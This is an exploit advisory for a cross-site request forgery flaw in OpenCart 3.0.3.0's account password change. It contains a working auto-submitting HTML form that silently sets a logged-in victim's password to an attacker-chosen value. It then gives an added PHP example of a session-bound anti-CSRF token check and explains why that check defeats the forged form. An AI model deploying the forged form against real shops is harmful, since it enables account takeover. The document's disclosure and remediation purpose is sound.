Opencart-v3-0-3-0 CSRF vulnerability in user password change
Software Link: https://github.com/opencart/opencart/
Date: 06.28.2018
Exploit Author: CK01
Version: <= V3-0-3-0

0x00 Vulnerability analysis

The user token is not verified when the password is changed, so a CSRF request can modify the user's password.

/upload/catalog/controller/account/password.php

0x01 Exploit

Save the following exploit as an HTML file and open it:

<html>
  <body>
    <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="password" value="CK01ck01" />
      <input type="hidden" name="confirm" value="CK01ck01" />
      <script>
        document.getElementById('post123').submit();
      </script>
    </form>
  </body>
</html>

...
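
A token check of the kind the analysis says is missing, written as an added example and not taken from OpenCart or from the advisory author. The function names, the `csrf_token` form field and session key, and the sample requests are assumptions made for illustration.

```php
<?php
// Added example, not OpenCart code: a per-session anti-CSRF token for a
// password-change handler. All names here are hypothetical.

// Return the session's token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only if the request carries the token bound to this session.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Decide whether a password-change request may proceed.
function handle_password_change(string $method, array $session, array $post): array
{
    if ($method !== 'POST') {
        return [405, 'method not allowed'];
    }
    if (!csrf_valid($session, $post)) {
        return [403, 'invalid or missing CSRF token'];
    }
    if (($post['password'] ?? '') === '' || $post['password'] !== ($post['confirm'] ?? null)) {
        return [400, 'password and confirmation do not match'];
    }
    return [200, 'password change accepted']; // a real handler would update the stored hash here
}

// Constructed sample requests: a cross-site form that carries no token,
// and a same-site form that embeds the session's token.
$session = [];
$token = csrf_token($session);
$forged = ['password' => 'example-pass', 'confirm' => 'example-pass'];
$legit = $forged + ['csrf_token' => $token];

print_r(handle_password_change('POST', $session, $forged));
print_r(handle_password_change('POST', $session, $legit));
```

The token has to be rendered into the legitimate password form as a hidden field; a page on another origin cannot read it, so an auto-submitting form like the one above is rejected.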